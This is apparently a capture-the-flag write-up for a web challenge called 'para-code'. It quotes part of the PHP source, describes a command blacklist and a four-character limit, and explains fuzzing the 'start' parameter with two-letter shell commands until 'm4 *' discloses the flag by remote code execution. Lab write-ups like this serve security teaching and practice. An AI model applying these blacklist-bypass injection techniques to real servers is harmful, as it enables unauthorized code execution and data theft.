search

para-code

Info
Details

Category

Web Exploitation

Difficulty

Medium

hashtag
Challenge Overview

This is a common web challenge where we see the source code only after we access the index.php.

<?php
require __DIR__ . '/flag.php';
if (!isset($_GET['start'])){
    show_source(__FILE__);
    exit;
}

it means that if there is no start path in the url, we get the source code, which is a serious vulerabilty because we could understand how to get the flag.

hashtag
Blacklist Filtering

the next important line of code is:

$blackList = array(
  'ss','sc','aa', .. );

where we understand that in the start path we shouldn t have nothing of what is above. That blacklist system could potentially be bypassed.

hashtag
Command Length Restriction

  • The length of the command should be 4 or less.

hashtag
Vulnerability Analysis

With these 3 important parts, I understand the the type of challenge I'm tackling so that s what I did to exploit this vulnerability (Remote Code Execution).

hashtag
Payload Generation

This command generates all 2-character shell commands that are not blacklisted, and appends * to each one, allowing to be fuzzed with a tool/python script.

Note: It's important to change your shell to BASH instead of ZSH to get ALL commands.

hashtag
Fuzzing the start Parameter

Then fuzz the start path using a tool or a script like this one:

hashtag
Flag Disclosure

It seems that m4 * was the right command which reveal the flag. If you had created all these one in ZSH Shell you wouldn't have got m4 and that was the only correct solution.

made by k0d

Previousdownloader-v1Nextold-tickets

Last updated